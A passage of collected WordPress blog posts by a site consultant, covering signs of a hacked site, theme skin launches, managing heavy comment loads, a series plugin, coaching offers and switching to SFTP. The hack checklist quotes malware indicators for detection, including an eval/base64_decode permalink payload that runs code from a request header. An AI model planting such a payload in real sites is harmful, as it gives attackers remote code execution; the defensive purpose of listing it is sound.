I’ve been fixing an awful lot of hacked sites over the past few weeks, and many site owners do not know they have been hacked until someone tells them, do yourself a favour and check over these items below and make sure your site is okay.

Look Inside your WordPress code file

Fire up your favourite ftp  client and edit a few of the files in your site root. Look for weird-looking code statements like this.

eval(base64_decode(” A LOAD OF ENCRYPTED CODE GOES HERE “);

An even better method is to download all of your site and run a search on all of the files from your pc or mac.  This is the most common hack I am seeing.

UPDATE November 2012 

Feel free to read the whole post, but I recently starting working with a hack recovery specialist.

I’ve been working with Sucri.net on a number of hacked WordPress sites for my clients.  At $80 their hack recovery and security monitoring package is absolutely excellent, get them on the case for a fast hack recovery.

Sucri.net

Check Out Your Permalink

Another hack method I have seen is to append some code on the end of the permalink.

Goto settings -> permalink and ensure nothing has been tagged onto the end.  This is what I saw/

%postname%/%&({${eval(base64_decode($_SERVER[HTTP_EXECCODE]))}}|.+)&%/

A valid permalink is something link %postname%

.htaccess

A site had been hacked, and the .htaccess file was edited and a 301 redirection to a viagra site.  Have a look in your .htaccess file HINT the leading period/full stop marks the file as hidden you will have to make sure your ftp client shows hidden files.

A healthy .hatccess for word press should look like this.

The site was hacked and a redirection was put in by adding the following entries to the wp-config file

define('WP_SITEURL', 'malicious URL');

define('WP_HOME', 'malicious URL);

Spurious Redirections From Your Home Page

Check your home page, many blog owners rarely visit the home page of their site, make sure it is not re-directing to a malware site.

Weird Content

The high-profile hack of Chris Brogan’s site saw wierd ads appear on his site, check over your site to make sure there are no weird banner ads

Google Site View

Do a search for your site on Google by typing in:

site:mydomain.com

This will show how Google sees your site, certain hack attacks change your page titles to advertise  viagra and other recreational pharmaceuticals check out http://www.pearsonified.com/2010/04/wordpress-pharma-hack.php

Google will also mark your site as “containing malware” if you have been hacked and you are hosting

Searches Leasing To YOur Site

Check out what searches are bringing people to your site, if you see viagra bringing people to your site as a keyword something is up.  If you use WordPress.com stats, that can give you a heads up.

Unusual Admin Users

Go to your authors and users section and look for weird admin level users.  Common ones I have seen are wordpress.org and system.

If you don’t recognise these users delete them.

Weird Database Tables

I’m not trying to make you paranoid, but you may want to inspect your tables too, I saw one hack attack which had created a rogue table full of malware.   The table was called wp_pagemeta, it looks like a proper table by masquerading as a cousin of the real table wp_postmeta.  Have a look at your tables can you account for them all?  Remember that plugins and themes can create their own tables too.

It’s Not Personal

Most hacked sites are just black hat SEO scam artists trying to increase their ranking, it’s not personal so don’t panic if you find you have been hacked.  Don’t take it personally, they are not out to getcha.  Give me a call if you find an issue.

It can be repaired.  Let me know in the comment if you would like some blog posts on cleaning up a hacked site.

Need More Help Fixing Your Hacked Site?

I’ve create a WordPress Hack Recovery Course

Photo credit Kapa Haka

I’m very pleased to annouce that a new joint venture between myself and Jonathan and Lea Woodward of Kinetiva and Location Indepenent fame has been launched, and that is our new site PremiumHeadwaySkins.com is now live.

What Is Premium Headway Skins

This is our new site to promote and sell Skins for the Headway wordpress theme.  Jonathan, Ace Designer is Cheif crafted the sites, and myself as Admiral Top Techie coded the sites.

It’s a great match of skills, I cannot design for toffee, but I am pretty good at all that coding stuff.

What Is A Skin

A skin custom design which sits on top of the Headway theme.

Why Do I Need A Skin

The trouble with the excellent framework themes such as Headway and Thesis is that unless you have a certain level of coding skill, you site can look like any number of other sites.  A skin takes the hard work of coding up a custom theme and packages it in a simple to use format.

You get a unique design plus the excellent features of the framwork theme.

Our Skins

We have gone live with two skins, with a third in production.  The first is designed for people selling professional services, we have two colour versions and some very slick design elements.

The second is a single page sales letter for people sellling digital products.  We have designs for memberships sites, ebooks and audio products in three colour schemes.

Get A Skin Today

Please visit our site and let us know what you think. PremiumHeadwaySkins.com

A quick post for all of you using the excellent Headway theme, If you don’t use Headway sorry for the interuption

PremiumHeadwayLeafs.com

I have just launched a new site to promote my Headway Leafs over at premiumheadwayleafs.com

What Is A Leaf

A Leaf is a content component which you can place on your pages using the visual editor. Think of leafs as widgets on steroids they can be places anywhere in you design not just on a sidebar,

My Leaves

The leaves I have developed are:

• Yet Another YouTube Leaf – this allows you to easily add and customise YouTube videos on your site
• Authorised Users – this leaf allows you to control the content seen by site visitors depending upon whether they are logged on
• Amazon S3 Secure Link – This allows you to create a secure link to content stored on your Amazon S3 configuration

Skins Coming Soon

Stay tuned next week for an annoucement on a Headway Skins project I have been working on

A lot of bloggers get very hung up about the number of comments they get.  Many writers are very insecure about their low comment count, they think that a huge number of comments are a validation of their writing, yours truly included.

I want to share a story with you about a client of mine with the exact opposite problem, he had too many comments and it was causing real problems with his site.

The Site with 500K + comments

Let me just say that again, this site had more than half a million legitimate comments, not spam, not great post thumbs up, but honest really valuable comments discussing the content.  If I can put that into perspective, A-list blogger Darren Rowse at Problogger.net recentl stated that he has 178K comments, we say pah to poultry levels like that.

When Comments Kill

The comments came in a huge rush because of the time sensitive nature of the blog posts, and this in turn overloaded the database and caused the whole site to crash.

I was called in to  performance tune the site and stop the site crashing under the load of comments.

Controlling Comments

It may be that you are overwhelmed by comments, with too many to reply to, or you are being inundated with SPAM, the rest of this posts gives you some ideas to control your comments, you may not have half a million, but you can have too many comments  Here are some of the techniques I used with the inundated site.

Close Comments

Contraversial I know, but why not just close your comments if you have become overwhelmed, why not just close comments, let you readers know the reason and say you cannot keep up with comment moderation and it is impacting on the quality of the content you are producing.  A number of successful bloggers have gone this route.

I find I am getting more feedback from Twitter now a days, it may be that comments have had their day anyway (but that’s for another post).

Add Anti-Spam protection

It may seem an obvious point, but I still see sites without anti-comment spam protection.  My favourite tool for this is Akismet  see http://akismet.com/

Install an antispam plugin, and keep the rubbish out of your comment moderation queue

Close Older Comments

There is an option on your discussion settings (settings->discussion) to close comments on posts that are over x days old.  If you content is time sensitive, why not consider this route?

Selectively Close Comments

If you scroll down to the discussion section of the post editor, there is an option to selectively disabled comments on a post.  If you don’t want to handle comments on a post,  disable them. only keep comments open on your key posts.

Require Authentication

Add a little discomfort to the commenting process by requiring authentication, people are less likely to comment, unless they are determined to if they need to register on your site and then login.

Off Load Your Comments

If comments are causing a large load on your server and impacting performance, why not consider offloading comments to someone elses server.

Intense Debate is a commenting platform developed by Automattic (the company behind WordPress) which allows you to host your comments on their system.  Let them take the performance hit for you.

http://intensedebate.com/

Moderate Ruthlessly

Junk everything that does not add value to your content, and let your reader know that, whilst you appreciate a great post thumbs up, you will not be publishing their comment unless it adds value to the post in question.

This will have an initial moderation overhead but once your readers get the message you will hopefully see less low quality comments and reduce your moderation admin job.

Code up Comment Flood Protection

In the end I coded up a custom solution for my client, I edited one of the comment add scripts, with a delay function, five seconds has to pass before the next comment can be added this is used to control the flow of comments and stop the backend database.

Comments Causing Concern?

Check out a couple of these idea to see if you can ease a problem most bloggers would kill for.

Writing a series of blog posts is a great idea for creating anticipation with your readers and making your blog more sticky or making it more likely that readers will come back.

If you can develop a compelling series of blog posts which you drip feed to your audience, they will be hanging on every word, looking forward to the next installment and possibly subscribing to your feed.

It is also a great way to break down a big topic into more manageable chunks so that:

1) it is less daunting to write

2) It is more palatable for your readers to consume in small chunks.

One problem with writing a series of posts is that you need to link to the other posts in the collection, and this can be a little fiddly to update and keep all these links in order.

Enter The Plugin

Never fear in-series is here.

The plugin I like to use for this task is in-series.http://wordpress.org/extend/plugins/in-series/ This is a tiny little plugin, but it does the job very well.

What Does It Do?

In series puts a table of contents at the top of every post you mark as a series, it also automatically updates the posts with links when you add a new post.

It also adds a link at the bottom of your posts with pointers to the next or previous post in the series.

You can see it in action on my series about backup and recovery https://dev.neilmatthews.com/backup-recovery-introduction

How Does it work?

A little widget is added to the edit posts page, near the bottom, using this you can create a new series, or add a post to the start or the end of the series.

The only downside of this plugin is the way you need to bubble posts up or down if you add them to the series in the wrong order, but this is still easier that changing a load of links in several posts.

Small Plugins Save Loads of Work

The tiny footprint and unassuming interface of the plugin masks some brilliant functionality, if you are planning a series of posts check our in-series to save you quite a bit of work updating your links

I would appreciate a couple of minutes of your time to complete this survey about creating custom themes.

I am considering a group coaching project to take a number of people through the process of creating a custom theme for their WordPress site.  I want to judge the need for this project.

My idea is to step through the design process, and to take that design and make it a complete custom design building upon the headway theme framework on my development server.  The last part of this process is to export the new custom theme to your live site.

The process will be group coaching sessions with me (and maybe some others) and access to a development area on my site to build your custom theme in a safe location where you cannot impact your live site.  I will make myself available to support your development thoughout the process so at the end of the sessions you have your own custom designed blog themes.

My current thinking is a six week process of coaching and development.  My rough outline of the  sessions will be:

1. Design Process
2. Introduction to headway
3. Implementing Your Design
4. Custom CSS Coding – introduction
5. Custom CSS Coding – the next level
6. Testing your theme and making it live

Please complete the survey below and let me know what you think.

[gravityform id=13 ]

 

I am opening up registration for a group coaching session I think may be useful to WordPress site owners.

Integrating WordPress And Twitter

The session I have been planning is a live webinar taking  you through integrating your WordPress site with twitter.

The session will show the mechanics of integrating your blog with Twitter, how to find readers for your site on twitter and how to promote your content on twitter.

Agenda

Here is the agenda for the session

• How to link WordPress to twitter, plugins and themes
• Promoting your posts on twitter
• Finding Readers for yoru blog on Twitter
• Using Twitter to find ideas for blog posts
• Your Twitter landing page
• Your twitter background
• Q & A Session

How It Works

The session will be conducted using gotomeeting, an on line meeting tool which will allow me to share my desktop with you.  I will give a presentation and demonstrate the techniques on my test twitter account and WordPress site.

The session will be recorded and made available to you for download, so you have a reference of our session.

It is expected that the session will last for approximately one hour.

How Much

I will be charging $19.99 for this session.

When

I am planning to run this session on Tuesday 6th April.   11:00 – 12:00 PST, 14:00 – 15:00 EST and 19:00 = 20:00 UK Time,

Book Your Slot

If you are interested in joining this session, please leave your details using the form below.

Places are limited to 15 because of the version of gotomeeting I use, so book early to avoid disappointment.

[gravityform id=9 title=false description=false]

If you do only ONE thing to secure your site, then please consult with your hosting provider and see if you can access your site to upload and download files via SFTP rather than FTP.

What is SFTP

SFTP stands for secure file transfer protocol,  it is a method of transferring files to and from your site in a secure manner.  The link between your local machine and the remote hosting computer is encrypted so nothing can be intercepted and used to hack your site.

Think about credit card transactions in a browser, you use the secure http protocol https, you will see a small lock logo which tells you your credit card details cannot be captured, it is the same thing with SFTP at a file level.

Why Is There A Problem with FTP

Using FTP all of your login information is sent in “the clear” to your site, this means your login ID and password are sent over the internet in plain text format that can be intercepted and understood.

It is a fairly easy task for hackers to “sniff” packets of data going across the internet in the clear, if they setup a filter looking for particular strings, for example the ftp login command, they can harvest login information and gain access to your site.

How To Use SFTP

Your first port of call will be your hosting provider.  Check out their documentation to see if you can switch from ftp to sftp, it is a very poor company that does not care enough about it’s customers security to provide this small security courtesy.

How you change from FTP to SFTP will depend upon the ftp client you use.  I like Filezilla, and all I need to do is prefix a host name with sftp://, please check the documentation of the tool you use.

When you connect for the first time your FTP client will ask you to accept a key from the remote machine, this is used in the encryption process

You may find you file uploads and downloads ar ea little slower, this will be caused by the overhead of encrypting the traffic, but this is a small price to pay for security.

VIDEO: See how easy it is to capture a password

A while back I create a screen cast video of me capturing login details from an ftp session to show you how easy it is to capture this data.

[youtube=http://www.youtube.com/watch?v=DjqMCneUR10]